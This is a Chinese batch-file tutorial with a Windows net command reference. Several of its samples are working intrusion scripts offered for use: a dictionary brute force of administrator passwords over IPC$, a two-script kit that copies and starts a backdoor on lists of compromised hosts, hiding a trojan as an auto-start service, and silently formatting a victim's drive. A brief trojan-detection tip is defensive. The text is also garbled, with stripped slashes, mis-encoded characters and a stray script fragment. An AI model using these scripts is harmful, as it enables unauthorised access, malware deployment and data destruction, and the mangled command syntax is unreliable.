建筑简单批处理命令

一.简单批处理内部命令批处理的高级运用！！小技巧哦！！！批处理大家都很熟悉吧！下面介绍批处理的几个知识点：1：巧用FC命令做查木马工具：首先建立批处理文件atm.bat：写入代码：@echooffdircwindowssystem32.exec111.txtdircwindowssystem32.dllc222.txt2建立批处理文件WLTS.bat写入代码：@echooffdircwindowssystem32.dllcfindexe.txtdircwindowssystem32.execfinddll.txtfcc111.txtcfindexe.txtcexe.txtfcc222.txtcfinddll.txtcdll.txt这样先在你机子上运行一下ATM.BAT以后当你疑心有木马时运行WLTS.BAT然后在到C：EXE.TXT和DLL.TXT看一下就能看到可疑文件了！这只是一个思路！！还可以用他清楚在你卸载软件时留下的垃圾文件！比方注册表里！2：用SUBST命令做硬盘驱动器！例substxc111其中X为盘符111为建立驱动器的文件夹3：巧用SUBST命令隐藏3.5驱动器substhcatm并把ATM文件夹该为只读！复原：在开始-运行-substad即可！！1.Echo命令翻开回显或关闭请求回显功能，或显示消息。如果没有任何参数，echo命令将显示当前回显设置。语法echo[{onoff}][message]Sample：@echooffechohelloworld在实际应用中我们会把这条命令和重定向符号〔也称为管道符号，一般用^〕结合来实现输入一些命令到特定格式的文件中.这将在以后的例子中表达出来。2.@命令表示不显示@后面的命令，在入侵过程中〔例如使用批处理来格式化敌人的硬盘〕自然不能让对方看到你使用的命令啦。Sample：@echooff@echoNowinitializingtheprogram,pleasewaitaminite...@formatXquautoset(format这个命令是不可以使用y这个参数的，可喜的是微软留了个autoset这个参数给我们，效果和y是一样的。)3.Goto命令指定跳转到标签，找到标签后，程序将处理从下一行开始的命令。语法：gotolabel〔label是参数，指定所要转向的批处理程序中的行。〕Sample：if{%1}=={}gotonoparmsif{%2}=={}gotonoparms〔如果这里的if、%1、%2你不明白的话，先跳过去，后面会有详细的解释。〕@RemcheckparametersifnullshowusagenoparmsechoUsagemonitor.batServerIPPortNumbergotoend标签的名字可以随便起，但是最好是有意义的字母啦，字母前加个：用来表示这个字母是标签，goto命令就是根据这个：来寻找下一步跳到到那里。最好有一些说明这样你别人看起来才会理解你的意图啊。4.Rem命令注释命令，在C语言中相当与--------,它并不会被执行，只是起一个注释的作用，便于别人阅读和你自己日后修改。RemMessageSample：@RemHereisthedescription.5.Pause命令运行Pause命令时，将显示下面的消息：Pressanykeytocontinue...Sample：@echooffbegincopya.d：backechoPleaseputanewdiskintodriverApausegotobegin在这个例子中，驱动器A中磁盘上的所有文件均复制到dback中。显示的注释提示您将另一张磁盘放入驱动器A时，pause命令会使程序挂起，以便您更换磁盘，然后按任意键继续处理。6.Call命令从一个批处理程序调用另一个批处理程序，并且不终止父批处理程序。call命令接受用作调用目标的标签。如果在脚本或批处理文件外使用Call，它将不会在命令行起作用。语法call[[Drive][Path]FileName[BatchParameters]][label[arguments]]参数[Drive}[Path]FileName指定要调用的批处理程序的位置和名称。filename参数必须具有.bat或d扩展名。7.start命令调用外部程序，所有的DOS命令和命令行程序都可以由start命令来调用。入侵常用参数：MIN开始时窗口最小化SEPARATE在分开的空间内开始16位Windows程序HIGH在HIGH优先级类别开始应用程序REALTIME在REALTIME优先级类别开始应用程序WAIT启动应用程序并等候它结束parameters这些为传送到命令程序的参数执行的应用程序是32-位GUI应用程序时，CMD.EXE不等应用程序终止就返回命令提示。如果在命令脚本内执行，该新行为那么不会发生。8.choice命令choice使用此命令可以让用户输入一个字符，从而运行不同的命令。使用时应该加c参数，c后应写提示可输入的字符，之间无空格。它的返回码为1234……如choicecdmedefrag,mem,end将显示defrag,mem,end[D,M,E]Sample：Sample.bat的内容如下@echooffchoicecdmedefrag,mem,endiferrorlevel3gotodefrag〔应先判断数值最高的错误码〕iferrorlevel2gotomemiferrotlevel1gotoenddefraosdefraggotoendmemmemgotoendendechogoodbye此文件运行后，将显示defrag,mem,end[D,M,E]用户可选择dme，然后if语句将作出判断，d表示执行标号为defrag的程序段，m表示执行标号为mem的程序段，e表示执行标号为end的程序段，每个程序段最后都以gotoend将程序跳到end标号处，然后程序将显示goodbye，文件结束。9.If命令if表示将判断是否符合规定的条件，从而决定执行不同的命令。有三种格式1、if参数==字符串待执行的命令参数如果等于指定的字符串，那么条件成立，运行命令，否那么运行下一句。(注意是两个等号〕如if%1==aformataif{%1}=={}gotonoparmsif{%2}=={}gotonoparms2、ifexist文件名待执行的命令如果有指定的文件，那么条件成立，运行命令，否那么运行下一句。如ifexistconfig.syseditconfig.sys3、iferrorlevelifnoterrorlevel数字待执行的命令如果返回码等于指定的数字，那么条件成立，运行命令，否那么运行下一句。如iferrorlevel2gotox2DOS程序运行时都会返回一个数字给DOS，称为错误码errorlevel或称返回码，常见的返回码为0、1。10.for命令for命令是一个比拟复杂的命令，主要用于参数在指定的范围内循环执行命令。在批处理文件中使用FOR命令时，指定变量请使用%%variablefor{%variable%%variable}in(set)docommand[CommandLineOptions]%variable指定一个单一字母可替换的参数。(set)指定一个或一组文件。可以使用通配符。command指定对每个文件执行的命令。command-parameters为特定命令指定参数或命令行开关。在批处理文件中使用FOR命令时，指定变量请使用%%variable而不要用%variable。变量名称是区分大小写的，所以%i不同于%I如果命令扩展名被启用，以下额外的FOR命令格式会受到支持FORD%variableIN(set)DOcommand[command-parameters]如果集中包含通配符，那么指定与目录名匹配，而不与文件名匹配。FORR[[drive]path]%variableIN(set)DOcommand[command-检查以[drive]path为根的目录树，指向每个目录中的FOR语句。如果在R后没有指定目录，那么使用当前目录。如果集仅为一个单点(.)字符，那么枚举该目录树。FORL%variableIN(start,step,end)DOcommand[command-para该集表示以增量形式从开始到结束的一个数字序列。因此，(1,1,5)将产生序列12345，(5,-1,1)将产生序列(54321)。FORF[options]%variableIN(file-set)DOcommandFORF[options]%variableIN(string)DOcommandFORF[options]%variableIN(command)DOcommand或者，如果有usebackq选项FORF[options]%variableIN(file-set)DOcommandFORF[options]%variableIN(string)DOcommandFORF[options]%variableIN(command)DOcommandfilenameset为一个或多个文件名。继续到filenameset中的下一个文件之前，每份文件都已被翻开、读取并经过处理。处理包括读取文件，将其分成一行行的文字，然后将每行解析成零或更多的符号。然后用已找到的符号字符串变量值调用For循环。以默认方式，F通过每个文件的每一行中分开的第一个空白符号。跳过空白行。您可通过指定可选options参数替代默认解析操作。这个带引号的字符串包括一个或多个指定不同解析选项的关键字。这些关键字为eol=c-指一个行注释字符的结尾(就一个)skip=n-指在文件开始时忽略的行数。delims=xxx-指分隔符集。这个替换了空格和跳格键的默认分隔符集。tokens=x,y,m-n-指每行的哪一个符号被传递到每个迭代的for本身。这会导致额外变量名称的格式为一个范围。通过nth符号指定m符号字符串中的最后一个字符星号，那么额外的变量将在最后一个符号解析之分配并接受行的保存文本。usebackq-指定新语法已在下类情况中使用在作为命令执行一个后引号的字符串并且引号字符为文字字符串命令并允许在fi中使用双引号扩起文件名称。sample1FORFeol=;tokens=2,3delims=,%iin(myfile.txt)docommand会分析myfile.txt中的每一行，忽略以分号打头的那些行，将每行中的第二个和第三个符号传递给for程序体；用逗号和或空格定界符号。请注意，这个for程序体的语句引用%i来取得第二个符号，引用%j来取得第三个符号，引用%k来取得第三个符号后的所有剩余符号。对于带有空格的文件名，您需要用双引号将文件名括起来。为了用这种方式来使用双引号，您还需要使用usebackq选项，否那么，双引号会被理解成是用作定义某个要分析的字符串的。%i专门在for语句中得到说明，%j和%k是通过tokens=选项专门得到说明的。您可以通过tokens=一行指定最多26个符号，只要不试图说明一个高于字母z或Z的变量。请记住，FOR变量是单一字母、分大小写和全局的；同时不能有52个以上都在使用中。您还可以在相邻字符串上使用FORF分析逻辑；方法是，用单引号将括号之间的filenameset括起来。这样，该字符串会被当作一个文件中的一个单一输入行。最后，您可以用FORF命令来分析命令的输出。方法是，将括号之间的filenameset变成一个反括字符串。该字符串会被当作命令行，传递到一个子CMD.EXE，其输出会被抓进内存，并被当作文件分析。因此，以下例子FORFusebackqdelims==%iIN(`set`)DO@echo%i会枚举当前环境中的环境变量名称。另外，FOR变量参照的替换已被增强。您现在可以使用以下选项语法~I-删除任何引号()，扩充%I%~fI-将%I扩充到一个完全合格的路径名%~dI-仅将%I扩充到一个驱动器号%~pI-仅将%I扩充到一个路径%~nI-仅将%I扩充到一个文件名%~xI-仅将%I扩充到一个文件扩展名%~sI-扩充的路径只含有短名%~aI-将%I扩充到文件的文件属性%~tI-将%I扩充到文件的日期时间%~zI-将%I扩充到文件的大小%~$PATHI-查找列在路径环境变量的目录，并将%I扩充到找到的第一个完全合格的名称。如果环境变量未被定义，或者没有找到文件，此组合键会扩充空字符串可以组合修饰符来得到多重结果%~dpI-仅将%I扩充到一个驱动器号和路径%~nxI-仅将%I扩充到一个文件名和扩展名%~fsI-仅将%I扩充到一个带有短名的完整路径名%~$ATHi-查找列在路径环境变量的目录，并将%I扩充到找到的第一个驱动器号和路径。%~ftzaI-将%I扩充到类似输出线路的DIR在以上例子中，%I和PATH可用其他有效数值代替。%~语法用一个有效的FOR变量名终止。选取类似%I的大写变量名比拟易读，而且防止与不分大小写的组合键混淆。以上是MS的官方帮助，下面我们举几个例子来具体说明一下For命令在入侵中的用途sample2：利用For命令来实现对一台目标Win2k主机的暴力密码破解。我们用netuseipipc$passworduadministrator来尝试这和目标主机进行连接，当成功时记下密码。最主要的命令是一条：forfi%in(dict.txt)donetuseipipc$i%uadministrator用i%来表示admin的密码，在dict.txt中这个取i%的值用netuse命令来连接。然后将程序运行结果传递给find命令－－forfi%%in(dict.txt)donetuseipipc$i%%uadministratorfind命令成功完成Dok.txt，这样就ko了。sample3：你有没有过手里有大量肉鸡等着你去种后门＋木马呢？，当数量特别多的时候，原本很开心的一件事都会变得很郁闷：〕。文章开头就谈到使用批处理文件，可以简化日常或重复性任务。那么如何实现呢？呵呵，看下去你就会明白了。主要命令也只有一条：〔在批处理文件中使用FOR命令时，指定变量使用%%variable〕@forftokens=1,2,3delims=%%iin(victim.txt)dostartcalldoor.bat%%i%%j%%ktokens的用法请参见上面的sample1，在这里它表示按顺序将victim.txt中的内容传递给door.bat中的参数%i%j%k。而cultivate.bat无非就是用netuse命令来建立IPC$连接，并copy木马＋后门到victim，然后用返回码〔Iferrorlever=〕来筛选成功种植后门的主机，并echo出来，或者echo到指定的文件。delims=表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这victim.txt里的内容是什么样的了。应该根据%%i%%j%%k表示的对象来排列，一般就是ippasswordusername。代码雏形：---------------cutherethensaveasabatchfile(Icallitmain.bat)---------------------------@echooff@if%1==gotousage@forftokens=1,2,3delims=%%iin(victim.txt)dostartcallIPChack.bat%%i%%j%%k@gotoendusage@echorunthisbatchindosmodle.orjustdouble-clickit.end---------------cutherethensaveasabatchfile(Icallitmain.bat)----------------------------------------------cutherethensaveasabatchfile(Icallitdoor.bat)-----------------------------@netuse%1ipc$%3u%2@iferrorlevel1gotofailed@echoTryingtoestablishtheIPC$connection…………OK@copywindrv32.exe%1admin$system32&&ifnoterrorlevel1echoIP%1USER%2PWD%3ko.txt@pec%1cwinntsystem32windrv32.exe@pec%1netstartwindrv32&&ifnoterrorlevel1echo%1Backdooredko.txtfailed@echoSorrycannotconnectedtothevictim.-----------------cutherethensaveasabatchfile(Icallitdoor.bat)--------------------------------这只是一个自动种植后门批处理的雏形，两个批处理和后门程序〔Windrv32.exe〕,Pec.exe需放在统一目录下.批处理内容尚可扩展,例如参加去除日志+DDOS的功能,参加定时添加用户的功能,更深入一点可以使之具备自动传播功能(蠕虫).此处不多做表达,有兴趣的朋友可自行研究.2：No.2二.如何在批处理文件中使用参数批处理中可以使用参数，一般从1%到9%这九个，当有多个参数时需要用shift来移动，这种情况并不多见，我们就不考虑它了。sample1：fomat.bat@echooffif%1==aformataformat@formataquauotset@echopleaseinsertanotherdisktodriverA.@pause@gotofomat这个例子用于连续地格式化几张软盘，所以用的时候需在dos窗口输入fomat.bata，呵呵,好似有点画蛇添足了～^_^sample2：当我们要建立一个IPC$连接地时候总要输入一大串命令，弄不好就打错了，所以我们不如把一些固定命令写入一个批处理，把肉鸡地ippasswordusername当着参数来赋给这个批处理，这样就不用每次都打命令了。@echooff@netuse1%ipc$2%u3%注意哦，这里PASSWORD是第二个参数。@iferrorlevel1echoconnectionfailed怎么样,使用参数还是比拟简单的吧？你这么帅一定学会了^_^.No.3三.如何使用组合命令(CompoundCommand)1.&Usage：第一条命令&第二条命令[&第三条命令...]用这种方法可以同时执行多条命令，而不管命令是否执行成功Sample：Cdirz&dircEx4rchThesystemcannotfindthepathspecified.VolumeindriveChasnolabel.VolumeSerialNumberis0078-59FBDirectoryofcEx4rch2002-05-142351DIR.2002-05-142351DIR..2002-05-14235114sometips.gif2.&&Usage：第一条命令&&第二条命令[&&第三条命令...]用这种方法可以同时执行多条命令，当碰到执行出错的命令后将不执行后面的命令，如果一直没有出错那么一直执行完所有命令；Sample：Cdirz&&dircEx4rchThesystemcannotfindthepathspecified.CdircEx4rch&&dirzVolumeindriveChasnolabel.VolumeSerialNumberis0078-59FBDirectoryofcEx4rch2002-05-142355DIR.2002-05-142355DIR..2002-05-14235514sometips.gif1File(s)14bytes2Dir(s)768,671,744bytesfreeThesystemcannotfindthepathspecified.在做备份的时候可能会用到这种命令会比拟简单，如：dirfiledatabasebackup.mdb&©filedatabasebackup.mdbEbackup如果远程效劳器上存在backup.mdb文件，就执行copy命令，假设不存在该文件那么不执行copy命令。这种用法可以替换IFexist了：〕type=textjavascriptshowAngel(no);type=textjavascriptif(parseInt(350173326)!=10)usezyj3.style.display=none;type=textjavascriptsrcString=contentarea3.value;srcString=ubbReplace(srcString,'abgchij');document.write(srcString);Usage：第一条命令第二条命令[第三条命令...]用这种方法可以同时执行多条命令，当碰到执行正确的命令后将不执行后面的命令，如果没有出现正确的命令那么一直执行完所有命令；Sample：CEx4rchdirsometips.gifdelsometips.gifVolumeindriveChasnolabel.VolumeSerialNumberis0078-59FBDirectoryofCEx4rch2002-05-14235514sometips.gif1File(s)14bytes0Dir(s)768,696,320bytesfree组合命令使用的例子：sample：@copytrojan.exe%1admin$system32&&ifnoterrorlevel1echoIP%1USER%2PASS%3victim.txtNo.4四、管道命令的使用1.命令Usage：第一条命令第二条命令[第三条命令...]将第一条命令的结果作为第二条命令的参数来使用，记得在unix中这种方式很常见。sample：timetDIP.lognetstat-n-ptcpfind3389DIP.logstartExplorer看出来了么？用于终端效劳允许我们为用户自定义起始的程序，来实现让用户运行下面这个bat，以获得登录用户的IP。2.、输出重定向命令将一条命令或某个程序输出结果的重定向到特定文件中,与的区别在于，会去除调原有文件中的内容后写入指定文件，而只会追加内容到指定文件中，而不会改动其中的内容。sample1：echohelloworldchello.txt(stupidexample)sample2时下DLL木马盛行，我们知道system32是个捉迷藏的好地方，许多木马都削尖了脑袋往那里钻，DLL马也不例外，针对这一点我们可以在安装好系统和必要的应用程序后，对该目录下的EXE和DLL文件作一个记录：运行CMD--转换目录到system32--dir.exeexeback.txt&dir.dlldllback.txt,这样所有的EXE和DLL文件的名称都被分别记录到exeback.txt和dllback.txt中,日后如发现异常但用传统的方法查不出问题时,那么要考虑是不是系统中已经潜入DLL木马了.这时我们用同样的命令将system32下的EXE和DLL文件记录到另外的exeback1.txt和dllback1.txt中,然后运行CMD--fcexeback.txtexeback1.txtdiff.txt&fcdllback.txtdllback1.txtdiff.txt.(用FC命令比拟前后两次的DLL和EXE文件,并将结果输入到diff.txt中),这样我们就能发现一些多出来的DLL和EXE文件,然后通过查看创立时间、版本、是否经过压缩等就能够比拟容易地判断出是不是已经被DLL木马光临了。没有是最好，如果有的话也不要直接DEL掉，先用regsvr32utrojan.dll将后门DLL文件注销掉,再把它移到回收站里，假设系统没有异常反映再将之彻底删除或者提交给杀毒软件公司。3.、&、&从文件中而不是从键盘中读入命令输入。&将一个句柄的输出写入到另一个句柄的输入中。&从一个句柄读取输入并将其写入到另一个句柄输出中。这些并不常用，也就不多做介绍。No.5五.如何用批处理文件来操作注册表在入侵过程中经常回操作注册表的特定的键值来实现一定的目的，例如为了到达隐藏后门、木马程序而删除Run下剩余的键值。或者创立一个效劳用以加载后门。当然我们也会修改注册表来加固系统或者改变系统的某个属性，这些都需要我们对注册表操作有一定的了解。下面我们就先学习一下如何使用.REG文件来操作注册表.(我们可以用批处理来生成一个REG文件)关于注册表的操作，常见的是创立、修改、删除。1.创立创立分为两种，一种是创立子项(Subkey)我们创立一个文件，内容如下：WindowsRegistryEditorVersion5.00[HKEY_LOCAL_MACHINESOFTWAREMicrosofthacker]然后执行该脚本，你就已经在HKEY_LOCAL_MACHINESOFTWAREMicrosoft下创立了一个名字为“hacker〞的子项。另一种是创立一个工程名称那这种文件格式就是典型的文件格式，和你从注册表中导出的文件格式一致，内容如下：WindowsRegistryEditorVersion5.00[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]Invader=Ex4rchDoor=CWINNTsystem32door.exeAutodos=dword02这样就在[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]下新建了Invader、door、about这三个工程Invader的类型是“Stringvalue〞door的类型是“REGSZvalue〞Autodos的类型是“DWORDvalue〞2.修改修改相对来说比拟简单，只要把你需要修改的工程导出，然后用记事本进行修改，然后导入〔regedits〕即可。3.删除我们首先来说说删除一个工程名称，我们创立一个如下的文件：WindowsRegistryEditorVersion5.00[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]Ex4rch=-执行该脚本，[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]下的Ex4rch就被删除了；我们再看看删除一个子项，我们创立一个如下的脚本：WindowsRegistryEditorVersion5.00[-HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]执行该脚本，[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]就已经被删除了。相信看到这里，.reg文件你根本已经掌握了。那么现在的目标就是用批处理来创立特定内容的.reg文件了，记得我们前面说道的利用重定向符号可以很容易地创立特定类型的文件。samlpe1如上面的那个例子,如想生成如下注册表文件WindowsRegistryEditorVersion5.00[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]Invader=Ex4rchdoor=hex255Autodos=dword000000128只需要这样：@echoWindowsRegistryEditorVersion5.00Sample.reg@echo[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]Sample.reg@echoInvader=Ex4rchSample.reg@echodoor=5CWINNTsystem32door.exeSample.reg@echoAutodos=dword02Sample.regsamlpe2我们现在在使用一些比拟老的木马时,可能会在注册表的[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun(Runonce、Runservices、Runexec)]下生成一个键值用来实现木马的自启动.但是这样很容易暴露木马程序的路径,从而导致木马被查杀,相对地假设是将木马程序注册为系统效劳那么相对平安一些.下面以配置好地IRC木马DSNX为例(名为windrv32.exe)@startwindrv32.exe@attrib+h+rwindrv32.exe@echo[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]patch.dll@echowindsnx=-patch.dll@sc.execreateWindriversrvtype=kernelstart=autodisplayname=WindowsDriverbinpath=cwinntsystem32windrv32.exe@regeditspatch.dll@deletepatch.dll@REM[删除DSNXDE在注册表中的启动项，用sc.exe将之注册为系统关键性效劳的同时将其属性设为隐藏和只读，并config为自启动]@REM这样不是更平安^_^.netstat命令的功能是显示网络连接、路由表和网络接口信息，可以让用户得知目前都有哪些网络连接正在运作。该命令的一般格式为：netstat[选项]命令中各选项的含义如下：-a显示所有socket，包括正在监听的。-c每隔1秒就重新显示一遍，直到用户中断它。-i显示所有网络接口的信息，格式同“ifconfig-e〞。-n以网络IP地址代替名称，显境鐾缌忧樾巍-r显示核心路由表，格式同“route-e〞。-t显示TCP协议的连接情况。-u显示UDP协议的连接情况。-v显示正在进行的工作。nslookup命令的功能是查询一台机器的IP地址和其对应的域名。它通常需要一台域名效劳器来提供域名效劳。如果用户已经设置好域名效劳器，就可以用这个命令查看不同主机的IP地址对应的域名。该命令的一般格式为：nslookup[IP地址域名]finger命令finger命令的功能是查询用户的信息，通常会显示系统中某个用户的用户名、主目录、停滞时间、登录时间、登录shell等信息。如果要查询远程机上的用户信息，需要在用户名后面接“@主机名〞，采用[用户名@主机名]的格式，不过要查询的网络主机需要运行finger守护进程。该命令的一般格式为：finger[选项][使用者][用户@主机]命令中各选项的含义如下：-s显示用户的注册名、实际姓名、终端名称、写状态、停滞时间、登录时间等信息。-l除了用-s选项显示的信息外，还显示用户主目录、登录shell、邮件状态等信息，以及用户主目录下的.plan、.project和.forward文件的内容。-p除了不显示.plan文件和.project文件以外，与-l选项相同。ping命令ping命令用于查看网络上的主机是否在工作，它向该主机发送ICMPECHO_REQUEST包。有时我们想从网络上的某台主机上下载文件，可是又不知道那台主机是否开着，就需要使用ping命令查看。该命令的一般格式为：ping[选项]主机名IP地址命令中各选项的含义如下：-c数目在发送指定数目的包后停止。-d设定SO_DEBUG的选项。-f大量且快速地送网络封包给一台机器，看它的回应。-I秒数设定间隔几秒送一个网络封包给一台机器，预设值是一秒送一次。-l次数在指定次数内，以最快的方式送封包数据到指定机器〔只有超级用户可以使用此选项〕。-q不显示任何传送封包的信息，只显示最后的结果。-r不经由网关而直接送封包到一台机器，通常是查看本机的网络接口是否有问题。-s字节数指定发送的数据字节数，预设值是56，加上8字节的ICMP头，一共是64ICMP数据字节。Net命令许多WindowsNT网络命令以net开始。这些net命令有一些公共属性：通过键入net可查阅所有可用的net命令。通过键入nethelp命令可在命令行中获得net命令的语法帮助。例如，要得到netaccounts命令的帮助，请键入nethelpaccounts。所有net命令接受选项yes和no〔可缩写为y和n〕。y对命令产生的任何交互提示自动答复“是〞，n答复“否〞。例如，netstopserver通常提示确认是否根据效劳器效劳结束所有效劳，netstopservery自动答复“是〞并关闭效劳器效劳。NetAccounts更新用户帐号数据库、更改密码及所有帐号的登录要求。必须要在更改帐号参数的计算机上运行网络登录效劳。netaccounts[forcelogoff{minutesno}][minpwlenlength][maxpwage{daysunlimited}][minpwagedays][uniquepwnumber][domain]netaccounts[sync][domain]参数无键入不带参数的netaccounts，将显示当前密码设置、登录时限及域信息。forcelogoff{minutesno}设置当用户帐号或有效登录时间过期时，结束用户和效劳器会话前的等待时间。no选项禁止强行注销。该参数的默认设置为no。指定forcelogoffminutes之后，WindowsNT在其强制用户退出网络minutes分钟之前，将给用户发出警报。如果还有翻开的文件，WindowsNT将警告用户。如果minutes小于两分钟，WindowsNT警告用户立即从网络注销。minpwlenlength设置用户帐号密码的最少字符数。允许范围是0-14，默认值为6。maxpwage{daysunlimited}设置用户帐号密码有效的最大天数。unlimited不设置最大天数。maxpwage选项的天数必须大于minpwage。允许范围是1-49,710天(unlimited)。默认值为90天。minpwagedays设置用户必须保持原密码的最小天数。0值不设置最小时间。允许范围是0-49,710天，默认值为0天。uniquepwnumber要求用户更改密码时，必须在经过number次后，才能重复使用与之相同的密码。允许范围是0-8。默认值为5。domain在当前域的主域控制器上执行该操作。否那么只在本地计算机执行操作。该参数仅用于WindowsNTServer域中的WindowsNTWorkstation计算机，WindowsNTServer计算机默认为在主域控制器执行操作。sync当用于主域控制器时，该命令使域中所有备份域控制器同步；当用于备份域控制器时，该命令仅使该备份域控制器与主域控制器同步。该命令仅适用于WindowsNTServer域成员的计算机。NetComputer从域数据库中添加或删除计算机。该命令仅在运行WindowsNTServer的计算机上可用。netcomputercomputername{adddel}参数computername指定要添加到域或从域中删除的计算机。add将指定计算机添加到域。del将指定计算机从域中删除。NetConfig显示当前运行的可配置效劳，或显示并更改某项效劳的设置。netconfig[service[options]]参数无键入不带参数的netconfig将显示可配置效劳的列表。service通过netconfig命令进行配置的效劳〔server或workstation〕。options效劳的特定选项。完整语法请参阅netconfigserver或netconfigworkstation。NetConfigServer运行效劳时显示或更改效劳器的效劳设置。netconfigserver[autodisconnecttime][srvcommenttext][hidden{yesno}]参数无键入不带参数的netconfigserver，将显示效劳器效劳的当前配置。autodisconnecttime设置断开前用户会话闲置的最大时间值。可以指定-1，表示永不断开连接。允许范围是-1-65535分钟，默认值是15分钟。srvcommenttext为效劳器添加注释，可以通过netview命令在屏幕上显示所加注释。注释最多可达48个字符，文字要用引号引住。hidden{yesno}指定效劳器的计算机名是否出现在效劳器列表中。请注意隐含某个效劳器并不改变该效劳器的权限。默认为no。NetConfigWorkstation效劳运行时，显示或更改工作站各项效劳的设置。netconfigworkstation[charcountbytes][chartimemsec][charwaitsec]参数无键入不带参数的netconfigworkstation将显示本地计算机的当前配置。charcountbytes指定WindowsNT在将数据发送到通讯设备之前收集的数据量。如果同时设置chartimemsec参数，WindowsNT按首先满足条件的选项运行。允许范围是0-65535字节，默认值是16字节。chartimemsec指定WindowsNT在将数据发送到通讯设备之前收集数据的时间。如果同时设置charcountbytes参数，WindowsNT按首先满足条件的选项运行。允许范围是0-65535000毫秒，默认值是250毫秒。charwaitsec设置WindowsNT等待通讯设备变为可用的时间。允许的范围是0-65535秒，默认值是3600秒。NetContinue重新激活挂起的效劳。netcontinueservice参数service能够继续运行的效劳，包括：fileserverformacintosh〔该效劳仅限于WindowsNTServer〕,ftppublishingservice,lpdsvc,netlogon,networkdde，networkddedsdm，ntlmsecuritysupportprovider，remoteboot〔该效劳仅限于WindowsNTServer〕，remoteaccessserver,schedule，server，simpletcpipservices及workstation。NetFile显示某效劳器上所有翻开的共享文件名及锁定文件数。该命令也可以关闭个别文件并取消文件锁定。netfile[id[close]]参数无键入不带参数的netfile可获得效劳器上翻开文件的列表。id文件标识号。close关闭翻开的文件并释放锁定记录。请从共享文件的效劳器中键入该命令。NetGroup在WindowsNTServer域中添加、显示或更改全局组。该命令仅在WindowsNTServer域中可用。netgroup[groupname[commenttext]][domain]netgroupgroupname{add[commenttext]delete}[domain]netgroupgroupnameusername[...]{adddelete}[domain]参数无键入不带参数的netgroup可以显示效劳器名称及效劳器的组名称。groupname要添加、扩展或删除的组。仅提供某个组名便可查看组中的用户列表。commenttext为新建组或现有组添加注释。注释最多可以是48个字符，并用引号将注释文字引住。domain在当前域的主域控制器中执行该操作，否那么在本地计算机上执行操作。该参数仅用于作为WindowsNTServer域成员的WindowsNTWorkstation计算机。WindowsNTServer计算机默认为在主域控制器中操作。username[...]列表显示要添加到组或从组中删除的一个或多个用户。使用空格分隔多个用户名称项。add添加组或在组中添加用户名。必须使用该命令为添加到组中的用户建立帐号。delete删除组或从组中删除用户名。NetHelp提供网络命令列表及帮助主题，或提供指定命令或主题的帮助。可用网络命令列于N下面的“命令参考〞中“命令〞窗口内。nethelp[command]netcommand{help}参数无键入不带参数的nethelp显示能够获得帮助的命令列表和帮助主题。command需要其帮助的命令，不要将net作为command的一局部。help提供显示帮助文本方式选择。显示命令的正确语法。NetHelpmsg提供WindowsNT错误信息的帮助。nethelpmsgmessage#参数message#需要其帮助的WindowsNT消息的四位代码。NetLocalgroup添加、显示或更改本地组。netlocalgroup[groupname[commenttext]][domain]netlocalgroupgroupname{add[commenttext]delete}[domain]netlocalgroupgroupnamename[...]{adddelete}[domain]参数无键入不带参数的netlocalgroup将显示效劳器名称和计算机的本地组名称。groupname要添加、扩充或删除的本地组名称。只提供groupname即可查看用户列表或本地组中的全局组。commenttext为新建或现有组添加注释。注释文字的最大长度是48个字符，并用引号引住。domain在当前域的主域控制器中执行操作，否那么仅在本地计算机上执行操作。该参数仅应用于WindowsNTServer域中的WindowsNTWorkstation计算机。WindowsNTServer计算机默认为在主域控制器中操作。name[...]列出要添加到本地组或从本地组中删除的一个或多个用户名或组名，多个用户名或组名之间以空格分隔。可以是本地用户、其他域用户或全局组，但不能是其他本地组。如果是其他域的用户，要在用户名前加域名〔例如，SALESRALPHR〕。add将全局组名或用户名添加到本地组中。在使用该命令将用户或全局组添加到本地组之前，必须为其建立帐号。delete从本地组中删除组名或用户名。NetName添加或删除消息名〔有时也称别名〕，或显示计算机接收消息的名称列表。要使用netname命令，计算机中必须运行信使效劳。netname[name[adddelete]]参数无键入不带参数的netname将列出当前使用的名称。name指定接收消息的名称。名称最多为15个字符。add将名称添加到计算机中。add是可选项，键入netnamename与键入netnamenameadd相同。delete从计算机中删除名称。NetPause暂停正在运行的效劳。netpauseservice参数service指以下效劳：fileserverformacintosh〔仅限于WindowsNTServer〕、ftppublishingservice、lpdsvc、netlogon、networkdde、networkddedsdm、ntlmsecuritysupportprovider、remoteboot〔仅限于WindowsNTServer〕、remoteaccessserver、schedule、server、simpletcpipservices或workstation。NetPrint显示或控制打印作业及打印队列。netprintcomputernamesharenamenetprint[computername]job#[holdreleasedelete]参数computername共享打印机队列的计算机名。sharename打印队列名称。当包含computername与sharename时，使用反斜杠()将它们分开。job#在打印机队列中分配给打印作业的标识号。有一个或多个打印机队列的计算机为每个打印作业分配唯一标识号。如果某个作业号用于共享打印机队列中，那么不能指定给其他作业，也不能分配给其他打印机队列中的作业。hold使用job#时，在打印机队列中使打印作业等待。打印作业停留在打印机队列中，并且其他打印作业只能等到释放该作业之后才能进入。release释放保存的打印作业。delete从打印机队列中删除打印作业。NetSend向网络的其他用户、计算机或通信名发送消息。要接收消息必须运行信使效劳。netsend{namedomain[name]users}message参数name要接收发送消息的用户名、计算机名或通信名。如果计算机名包含空字符，那么要将其用引号()引住。将消息发送到组中所有名称。domain[name]将消息发送到计算机域中的所有名称。如果指定name，那么消息将发送到指定域或组中的所有名称。users将消息发送到与效劳器连接的所有用户。message作为消息发送的文本。NetSession列出或断开本地计算机和与之连接的客户端的会话。netsession[computername][delete]参数无键入不带参数的netsession可以显示所有与本地计算机的会话的信息。computername标识要列出或断开会话的计算机。delete结束与computername计算时机话并关闭本次会话期间计算机的所有翻开文件。如果省略computername参数，将取消与本地计算机的所有会话。NetShare创立、删除或显示共享资源。netsharesharenamenetsharesha